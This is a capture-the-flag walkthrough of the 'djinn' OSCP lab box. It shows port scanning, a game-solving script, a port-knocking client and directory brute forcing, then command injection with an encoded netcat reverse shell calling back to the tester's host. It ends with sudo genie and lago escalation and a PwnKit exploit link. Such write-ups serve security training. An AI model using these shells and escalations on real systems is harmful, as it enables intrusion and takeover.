OSCP lab
Lab overview
Box   | Difficulty | Techniques
djinn | easy       | FTP usage, port knocking, Python scripting, command-execution vulnerability, sudo genie privilege escalation, program analysis, pkexec privilege escalation
Information gathering
Host discovery
Port scanning
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.47
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 02:36 EST
Nmap scan report for 192.168.1.47
Host is up (0.00068s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
|   NULL:
|       ____                         _____ _
|      / ___| __ _ _ __ ___   ___  |_   _(_)_ __ ___   ___
|     | |  _ / _` | '_ ` _ \ / _ \   | | | | '_ ` _ \ / _ \
|     | |_| | (_| | | | | | |  __/   | | | | | | | | |  __/
|      \____|\__,_|_| |_| |_|\___|   |_| |_|_| |_| |_|\___|
|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|     (4, '-', 3)
|     >
|   RPCCheck:
|       ____                         _____ _
|      / ___| __ _ _ __ ___   ___  |_   _(_)_ __ ___   ___
|     | |  _ / _` | '_ ` _ \ / _ \   | | | | '_ ` _ \ / _ \
|     | |_| | (_| | | | | | |  __/   | | | | | | | | |  __/
|      \____|\__,_|_| |_| |_|\___|   |_| |_|_| |_| |_|\___|
|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|     (7, '+', 4)
|_    >
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP: [raw fingerprint omitted; it repeats the "Game Time" banner shown above, ending with "(4, '-', 3)\n> " for the NULL probe and "(7, '+', 4)\n> " for the RPCCheck probe]
MAC Address: 08:00:27:9F:39:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
The files readable over anonymous FTP give the hints. When we connect to port 1337 the connection keeps getting reset.
The banner says we have to answer 1000 questions before it hands over the "gift", so we write a Python script to play the game (each question arrives as a tuple such as (4, '-', 3) followed by a "> " prompt):
import re
import time
import pwn

c = pwn.remote('192.168.1.47', 1337)
c.recvuntil(b"gift.\n")          # skip the banner; the first question follows it

count = 0
while count < 1000:
    count += 1
    # each question arrives as a Python tuple, e.g. "(4, '-', 3)\n> "
    data = c.recvuntil(b")").decode()
    c.recvuntil(b"> ")           # consume the prompt that follows the tuple
    print(data)
    # parse by pattern rather than fixed string offsets, so multi-digit operands work
    m = re.search(r"\((-?\d+), '([-+*/])', (-?\d+)\)", data)
    num1, todo, num2 = int(m.group(1)), m.group(2), int(m.group(3))
    if todo == "+":
        answer = num1 + num2
    elif todo == '-':
        answer = num1 - num2
    elif todo == '*':
        answer = num1 * num2
    elif todo == '/':
        answer = num1 / num2
    c.send((str(answer) + "\n").encode())
    print(answer, count)
    time.sleep(0.5)              # be gentle with the server; the game resets on errors

print(c.recvall(timeout=5).decode())   # the "gift" sent after the 1000th answer
Rescanning the ports afterwards shows that port 22, which was filtered in the first scan, is now open.
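Port 22 was filtered in the first scan and only answers after the game on 1337 is finished, and the overview table lists port knocking among the box's techniques. As an added example (not the page's code), here is a small Python client that sends a knock sequence and then confirms whether port 22 accepts a connection; the KNOCK_SEQUENCE value is a placeholder assumption, since the page does not reproduce the ports the game hands out.

```python
import socket
import time

# Constructed example values: the target is the box from the scan above, the
# knock sequence is a placeholder and NOT the real one handed out by the game.
TARGET = "192.168.1.47"
KNOCK_SEQUENCE = [1111, 2222, 3333]   # assumption: replace with the ports from the "gift"


def is_open(host, port, timeout=1.0):
    """Return True if a full TCP connect to host:port succeeds, False on refuse/timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def knock(host, ports, delay=0.2, timeout=0.5):
    """Attempt one TCP connection to each port in order.

    A knock daemon only needs to see the SYN, so the attempts are expected to be
    refused or time out; failures are deliberately ignored.
    """
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:
            pass
        finally:
            s.close()
        time.sleep(delay)   # knockd sequences usually require the knocks in order, not in a burst


def knock_and_check(host, ports, check_port=22):
    """Knock, then report (state before, state after) of the port the knock should open."""
    before = is_open(host, check_port)
    knock(host, ports)
    after = is_open(host, check_port)
    return before, after


if __name__ == "__main__":
    before, after = knock_and_check(TARGET, KNOCK_SEQUENCE)
    print(f"port 22 before knock: {'open' if before else 'closed/filtered'}")
    print(f"port 22 after knock:  {'open' if after else 'closed/filtered'}")
```

A filtered port gives a timeout rather than a refusal, so is_open reports False either way; comparing the before/after states is what tells you the knock did something, and a second run with the ports in the wrong order is a quick check that the daemon really is order-sensitive.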
Directory scanning
Directory brute forcing on port 7331 finds the wish directory:
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.47:7331 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.47:7331
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.47:7331/wish (Status: 200) [Size: 385]
The page at /wish is simply a command-execution form.
Gaining access
Generate a reverse shell with https://www.revshells.com/. The plain payload does not get a shell back here; encode it as base64 (or another encoding) so that the command reaches the target intact and is decoded there:
echo "cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjEyOSA4OTg5ID4vdG1wL2Y=" | base64 -d | sh
Privilege escalation
In a hidden directory under the nitish user's home we find the SSH login password. nitish can run genie via sudo as the user sam; the GTFOBins entry for genie:
https://gtfobins.github.io/gtfobins/genie/
sudo -u sam /usr/bin/genie b -cmd
When lago is run, pick option 2, the number-guessing game: it asks you to pick a number from 1 to 100, and when you guess right it returns a shell.
Run the following loop and keep entering 2 each time until a shell appears; since lago runs under sudo, that shell is root:
while true;do sudo /root/lago; done
Addendum
pkexec can also be used to go straight to root. List the SUID binaries first:
find / -perm -u=s -type f 2>/dev/null
Then use the following exploit (PwnKit, CVE-2021-4034) to escalate directly to root:
https://github.com/luijait/PwnKit-Exploit
End
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】djinn